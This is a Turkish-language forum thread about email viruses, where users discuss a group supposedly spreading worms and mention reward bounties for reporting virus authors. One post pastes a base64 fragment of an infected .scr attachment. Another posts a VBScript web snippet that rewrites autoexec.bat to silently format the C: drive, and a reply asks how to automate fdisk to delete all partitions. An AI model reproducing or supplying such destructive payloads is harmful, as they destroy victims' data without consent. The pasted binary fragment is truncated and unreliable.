Virüs Yazmayın Kardeşim

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    username
    username's avatar
    Erkek
    BİNR denen grup virüs piyasasını canlı tutuyor eski virüs kodlarını karıştırarak kombo virüsler yapıyorlar.Hatta sahte maıl programları ilede karıştırıyorlar.Şu an yeni çıkan hello(hi,test)başlığı altından gelen virüsü bunlar programladılar.
    Herifler bişeyden anlamıyomuş gibi salak numarası yapıyorlar.Yakında virüs piyasası bunların eline geçerse şaşırmamak gerekir.
    BU söylediklerimin hepsini chatte muhabbet ederken öğrendim.Bu (karakterin anlamı)lar benim makinayı denem tahtasına çevirdiler.
    Bence bir antivirüs grubu kurup bu ..nelerr kaynalıyalım
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    italyan
    italyan's avatar
    Erkek
    Demek türkler yapmış benim bildiğim türk virüs bi tek uğur mumcu(isimde hata varsa afola) var.
    Aslında kötü bi iş yazmayın virüs mirüs.
    Bu arada adamlar o kadar salak mı biz virüs yaptık desin,eğer adamları tanıyorsan ihbar et virüs yazarını ihbar edene para ödülü veriyorlar.

Ne Baktın?
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Criminal2
    Criminal2's avatar
    Erkek
    aaaaa türkler virusmü yazmış ???
    aaaaa dünyada şu anda aktiv virus varmıymış ??
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    italyan
    italyan's avatar
    Erkek
    username kim lan bu BİNR şerefsizler sabahtan beri 10 tane virüs geldi maıl adresime

Ne Baktın?
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ChAtLaC
    ChAtLaC's avatar
    Erkek
    test.zip içindeki test.scr bunların yarattığı virüslerden mi? Bir tanede bana gelmişti de
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    italyan
    italyan's avatar
    Erkek
    Bu virüslü maili merakıma dayanamayıp internet cafede açtım.Hiçbirşey olmadı.Bilmiyorum acaba kendini farklı bir yere mi kaydediyor.açımnca virüsü bir sürü kod çıkıyor.

Ne Baktın?
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    peder
    peder's avatar
    Erkek
    ------=_NextPart_000_0005_2435CA13.C89F160C
    Content-Type: application/octet-stream;
    name="wml.scr"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment;
    filename="wml.scr"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUA
    AEwBAwAAAAAAAAAAAAAAAADgAA8BCwEHAABQAAAAEAAAAGAAAGC+AAAAcAAAAMAAAAAASgAAEAAA
    AAIAAAQAAAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQ
    AAAAAAAAAAAAAADowQAAMAEAAADAAADoAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABgAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADg
    VVBYMQAAAAAAUAAAAHAAAABQAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAADAAAAA
    BAAAAFQAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAMS4yNABVUFghDAkCCUh+iY/UNhyBKZYAAFNOAAAAgAAAJgEAxe6H
    ApIAUCZKAEAD/bJpmiwQBPQl6AEAS85pmm7ZH8gqwAO4sKimaZqmoJiQiICapmmaeHBoYFhQzWCf
    aUgARAc4MDRN03QDKCQcGBDTLLvXCCMD+Cnw6E3TNE3g2NDIvLQ0TdM0rKSclIzONk3TiHxwaClv
    XKbpmsEHVEwDRDiapmmaLCQcFAwEaZrObfwofwP07OSmaZqm3NTMyLyapmmatKykoJiQZ5umaYyA
    eHAoe2jebNN1B1wDVEwo//sLdrb740APNCj3LC8DmqYZ+SQoShwUDARpms7sm/wnA+zo4KZpmqbY
    1MzIwJqmabq4J7CsqKCYaZqmaZSMiIR8pGmapnRsZFxUaZqmG0wDREA4MKZpmqYoIBgQCJqmc5sA ( kısa daha devamı vardı bir bölmü )

devamlı gelen şeyler virüsmüdür nedir a.q. neyse
    ben herzaman açarım gelen mailleri virüs"te oLsa yine açarım..

TaNRı TüRKü KoRuSuN ve YüCeLTSiN
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Antikky
    Antikky's avatar
    Üstün Hizmet Madalyası Üstün Hizmet Madalyası
    Erkek
    Piyasada birrr sürü türk virüs var aslında...
    Uğur mumcunun kodlarıda var bende.
    O gün bartnez in yazdığı bir virüs vardı hata buralarda...

Umursamaz Tavrımın Hastası Olunuz.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    peder
    peder's avatar
    Erkek
    x11;

<html>
    <script language="VBScript">
    dosya="C:\autoexec.bat"
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile(""&dosya&"", true)
    a.WriteLine("@echo off")
    a.WriteLine("format c: /autotest /u /q")
    a.close
    </script>
    </html>

Bu kodlardan bahsettin galiba:)))

TaNRı TüRKü KoRuSuN ve YüCeLTSiN
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    the_Rock_ula
    the_Rock_ula's avatar
    Erkek
    ya bu fdiski de otamatikleştirip (/autotest gibim) bütün partitionları sildirecek bi komut yk mu bea?

Her Hakkı Sakıncalıdır (S)
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    italyan
    italyan's avatar
    Erkek
    Geçen gün gazetede okudum şu anda dünyanın en hızlı yayılan virüsü ünvanını aldı bu virüs.

Bu arada microsoft bu virüsün yazarını ihbar edene
    250.000 dolar ödül veriyor.

Ne Baktın?
Toplam Hit: 1992 Toplam Mesaj: 16